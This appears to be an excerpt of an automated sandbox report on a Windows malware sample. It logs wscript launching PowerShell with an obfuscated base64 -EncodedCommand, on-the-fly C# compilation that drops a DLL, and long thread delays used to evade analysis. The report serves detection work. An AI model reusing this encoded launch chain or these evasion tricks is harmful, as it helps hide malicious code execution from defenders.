    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1083Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 838Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1792Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1792Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.dllJump to dropped file
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: powershell.exe, 00000012.00000002.800533822.0000000004ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: k:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: powershell.exe, 00000012.00000002.800533822.0000000004ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Disdai Dishuma5 Sort TAFFE Crampoond GRUNTINGB Preambulat3 Assimil6 Fursemideb Furiensdec Alarmure2 Chorib HUMO FISTELSTEM Stege chesse barrymor Anngrethe3 #Remingli4 ernr Bespyt Sulphozin8 VIRGULA IFRD Fore Pluralveks1 Profilenu nonfo Injust9 Nourishmen3 tomahavken Essay1 BLAA transmog hulk inlaye #kvar Kobangfor6 Hyperarc6 GARDEROBEN Oncosphere Bunglin BARYT TOMASTE CORROBORAT CYKELPAR Stadslg3 Bacilleb BLURTIN administr Milieub3 Bladele8 apometab #Peal8 King9 Opmrkerco IDELIGESI Systemat7 Preoper3 Reso SPAGNUM Land reckoni depraver fartjsfort LANN Griffonag3 AFSE hjsd analysearb AMULAS #unjolly Instrumen GLALIINGL Resoap Womani Leggier5 UNBREAKING Orillio adrea ALTOLAT Fago2 Inflammat6 COCKNEYDOM SYMPOSI gravereu FORUD FASTRESFI Kontrol SKRLEV ANALYTIKER UNCR Sortsr vidnefrs EOCARBO Takt Betvivler3 Velar #Revancher Wordables lousierma indlogrbrn Atta REBLOWNGU QUEBRITHC GRNSEOVERG frytlernes LEMPELIGES #andelss Camballm4 Sortering Lngstleven outboxe SIGNIFICAT Mana DUNKARD Unscor tronb hypohemiag MATTESTE engros Feri2 UNCONVE Mindstehj Nitrogen chev Korp6 stted miskred umenneske Galoplo Udskriv2 MAGNETOMET TRILLIONTH HAARBRSTE Immatc6 drueh Ssla Countryro2 Nonex #Alisphen sula idmmel Tribrac2 Tilegnel Unde dksd tujasur Circ8 Broo Appe1 Oksehude netstroem Teknolog2 klore BALLADR UNFLUTTERE boyko Tilbringe physi FELWO Generisktv5 Sukke Lodgeart3 #Unevada Enceph2 poleremi zakariass scoll Boatl7 Samar Hutchi acetanion INTE Stubb alde Lambk Nonretra Skan
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Disdai Dishuma5 Sort TAFFE Crampoond GRUNTINGB Preambulat3 Assimil6 Fursemideb Furiensdec Alarmure2 Chorib HUMO FISTELSTEM Stege chesse barrymor Anngrethe3 #Remingli4 ernr Bespyt Sulphozin8 VIRGULA IFRD Fore Pluralveks1 Profilenu nonfo Injust9 Nourishmen3 tomahavken Essay1 BLAA transmog hulk inlaye #kvar Kobangfor6 Hyperarc6 GARDEROBEN Oncosphere Bunglin BARYT TOMASTE CORROBORAT CYKELPAR Stadslg3 Bacilleb BLURTIN administr Milieub3 Bladele8 apometab #Peal8 King9 Opmrkerco IDELIGESI Systemat7 Preoper3 Reso SPAGNUM Land reckoni depraver fartjsfort LANN Griffonag3 AFSE hjsd analysearb AMULAS #unjolly Instrumen GLALIINGL Resoap Womani Leggier5 UNBREAKING Orillio adrea ALTOLAT Fago2 Inflammat6 COCKNEYDOM SYMPOSI gravereu FORUD FASTRESFI Kontrol SKRLEV ANALYTIKER UNCR Sortsr vidnefrs EOCARBO Takt Betvivler3 Velar #Revancher Wordables lousierma indlogrbrn Atta REBLOWNGU QUEBRITHC GRNSEOVERG frytlernes LEMPELIGES #andelss Camballm4 Sortering Lngstleven outboxe SIGNIFICAT Mana DUNKARD Unscor tronb hypohemiag MATTESTE engros Feri2 UNCONVE Mindstehj Nitrogen chev Korp6 stted miskred umenneske Galoplo Udskriv2 MAGNETOMET TRILLIONTH HAARBRSTE Immatc6 drueh Ssla Countryro2 Nonex #Alisphen sula idmmel Tribrac2 Tilegnel Unde dksd tujasur Circ8 Broo Appe1 Oksehude netstroem Teknolog2 klore BALLADR UNFLUTTERE boyko Tilbringe physi FELWO Generisktv5 Sukke Lodgeart3 #Unevada Enceph2 poleremi zakariass scoll Boatl7 Samar Hutchi acetanion INTE Stubb alde Lambk Nonretra SkanJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA741.tmp" "c:\Users\user\AppData\Local\Temp\nixooqy0\CSCD80281C713344E65BE3EDC717FEDF542.TMP"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
